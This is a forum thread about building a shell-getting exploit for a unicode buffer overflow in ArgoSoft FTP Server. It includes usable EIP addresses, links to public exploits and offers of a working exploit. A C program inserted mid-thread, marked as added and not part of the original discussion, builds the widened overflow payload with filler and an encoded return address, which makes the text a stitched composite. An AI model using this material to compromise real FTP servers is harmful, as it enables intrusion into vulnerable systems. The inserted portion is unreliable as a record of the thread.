unicode overflows

This is a discussion on "unicode overflows" within the Hacking part of the Computer Security: Discussions section.
Once I wrote a PoC, http://www.milw0rm.com/id.php?id=908, for ArgoSoft FTP to show that the new version is still vulnerable. At that time I really didn't give it a try to get a shell, but now, for educational purposes, I am giving it a new try to get a shell. But listen to the story: as it is a unicode overflow, getting a shell is not easy and reliable. I went to the famous WebDAV unicode overflow exploits:

1) http://www.milw0rm.com/id.php?id=1, which is written by kralor. I went to undernet #coromputer and spoke to him about this; he told me what to do, but as he is a bit lazy he didn't explain it well (he is very nice). He mentioned high-level memory addressing, which could be useful, or finding a usable address which could be used in EIP.

2) http://www.milw0rm.com/id.php?id=2. Roman explained very well, but there are still many whys for me! Aha, EIP = 0x00480004 is what he used, so I searched and I found some (XP SP1 addresses):

002E00F0 ==> call EAX
00460023 ==> call ESI

and other addresses for ESI, but I don't see any use in them; they are not pointing anywhere useful. Note that we can use SEH too. I can send the shellcode with a command like CD before the overflow command, and they won't be [censored] up with 00, but pointing to them is another problem. I want to know any of your ideas, especially about that high-level memory addressing. Everything up to 1.4.2.9 is vulnerable.
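The constraint the post is circling, why Roman's EIP value 0x00480004 works while an arbitrary address such as 0x7C801234 cannot be used, can be checked with a small simulation. The C below is an added example, not code from this thread or from any of the linked milw0rm exploits: it models the ANSI-to-UTF-16LE widening as the simple "every input byte is followed by 0x00" rule, filters a candidate list down to the addresses that survive it, and builds a narrow payload that widens into a chosen address at a chosen offset. The "USER " command prefix, the EIP offset of 100 widened bytes, and the candidate list (the three XP SP1 addresses quoted above plus two unusable ones) are assumptions made for the demo, not ArgoSoft's real offsets.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Simulate the ANSI -> UTF-16LE widening a Unicode-aware server applies to
 * attacker input: every byte b becomes the pair b, 0x00 (assumption: plain
 * ASCII input, no best-fit or multibyte mapping). Returns bytes written. */
size_t unicode_expand(const unsigned char *in, size_t in_len,
                      unsigned char *out, size_t out_cap)
{
    size_t n = 0;
    for (size_t i = 0; i < in_len && n + 2 <= out_cap; i++) {
        out[n++] = in[i];
        out[n++] = 0x00;
    }
    return n;
}

/* An address can land in EIP through a Unicode overflow only if its
 * little-endian byte image is XX 00 YY 00, i.e. the value is 0x00YY00XX
 * (0x00480004 has this shape, 0x7C801234 does not). XX and YY must be
 * non-zero, or a C-string copy of the narrow payload stops early. */
int unicode_reachable(uint32_t addr)
{
    unsigned char b0 = addr & 0xff, b1 = (addr >> 8) & 0xff;
    unsigned char b2 = (addr >> 16) & 0xff, b3 = (addr >> 24) & 0xff;
    return b1 == 0 && b3 == 0 && b0 != 0 && b2 != 0;
}

/* The two narrow bytes that widen into addr; -1 if addr is unreachable. */
int unicode_encode_addr(uint32_t addr, unsigned char narrow[2])
{
    if (!unicode_reachable(addr))
        return -1;
    narrow[0] = addr & 0xff;
    narrow[1] = (addr >> 16) & 0xff;
    return 0;
}

/* Keep only the reachable entries of a candidate list, e.g. one produced by
 * dumping every address of the target process. Returns the count kept. */
size_t filter_candidates(const uint32_t *cands, size_t n,
                         uint32_t *kept, size_t cap)
{
    size_t k = 0;
    for (size_t i = 0; i < n && k < cap; i++)
        if (unicode_reachable(cands[i]))
            kept[k++] = cands[i];
    return k;
}

/* Build the narrow payload (command prefix, filler, then the two bytes that
 * widen into addr at widened offset eip_off), widen it into wide, and return
 * the widened length, or 0 if the address or offset cannot be hit. */
size_t build_unicode_overflow(const char *cmd, size_t eip_off, uint32_t addr,
                              unsigned char *wide, size_t wide_cap)
{
    unsigned char narrow[512], enc[2];
    size_t cmd_len = strlen(cmd), narrow_off;

    if (eip_off % 2 != 0)     /* widening puts input bytes at even offsets only */
        return 0;
    narrow_off = eip_off / 2;
    if (narrow_off < cmd_len || narrow_off + 2 > sizeof narrow)
        return 0;
    if (unicode_encode_addr(addr, enc) != 0)
        return 0;
    memcpy(narrow, cmd, cmd_len);
    memset(narrow + cmd_len, 'A', narrow_off - cmd_len);
    narrow[narrow_off] = enc[0];
    narrow[narrow_off + 1] = enc[1];
    return unicode_expand(narrow, narrow_off + 2, wide, wide_cap);
}

/* Read a dword from the widened buffer the way a ret would pop it. */
uint32_t wide_read_le32(const unsigned char *wide, size_t off)
{
    return (uint32_t)wide[off] | (uint32_t)wide[off + 1] << 8 |
           (uint32_t)wide[off + 2] << 16 | (uint32_t)wide[off + 3] << 24;
}

/* What lands in EIP if the widened payload overwrites the saved return
 * address at widened offset 100 (assumed offset for the demo). */
uint32_t demo_eip_value(uint32_t addr)
{
    unsigned char wide[1024];
    size_t len = build_unicode_overflow("USER ", 100, addr, wide, sizeof wide);
    return len >= 104 ? wide_read_le32(wide, 100) : 0;
}

int main(void)
{
    static const uint32_t cands[] = { 0x002E00F0, 0x00460023, 0x00480004,
                                      0x7C801234, 0x00480000 };
    uint32_t kept[8];
    size_t n = filter_candidates(cands, 5, kept, 8);
    for (size_t i = 0; i < n; i++)
        printf("reachable through widening: 0x%08X\n", kept[i]);
    printf("EIP after widening: 0x%08X\n", demo_eip_value(0x00480004));
    return 0;
}
```

The filter is the part worth scripting over a real address dump: only values of the form 0x00YY00XX are candidates, which is why the post's search turned up addresses like 002E00F0 and 00460023 rather than anything in a system DLL.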
Quote:
(from matt miller) It dumps every address of a loaded process; then you have to script a bit to find something usable. Else, what you can do is debug the ftp server a lot, and see if you can redirect EIP to a server function which will then help you get back to your execution code. Hmm, there is so much you can do being able to overwrite 3 bytes; I'm sure you will manage to find something.

and binary
Thank you for the information. I am giving it a try; it won't be an easy job! The shellcode address differs on other systems in a normal overflow; as I remember, the WebDAV exploits didn't use to work on many systems! I will do as you said; I will work with that tool.
Check this -> http://www.milw0rm.com/id.php?id=1075. I was thinking of your writing, then this was planted on my desk... hehe, it actually works too. Maybe move the file itself (the PoC; I have bin/c here) to the xpsp2k EIP section, but then also, this is kinda advanced, and I think it would be happier here, with some cool pizza-eating dudes. (Yes, it compiles fine, and no, don't ask how or what shellcode addresses to change; it is not needed on this version.) I can supply help on this, in varied form of course depending on how/who, and yes, it will get shell. Not tested outside my LAN, but this is a fine example of some advanced stuff which is working.

Regards, hx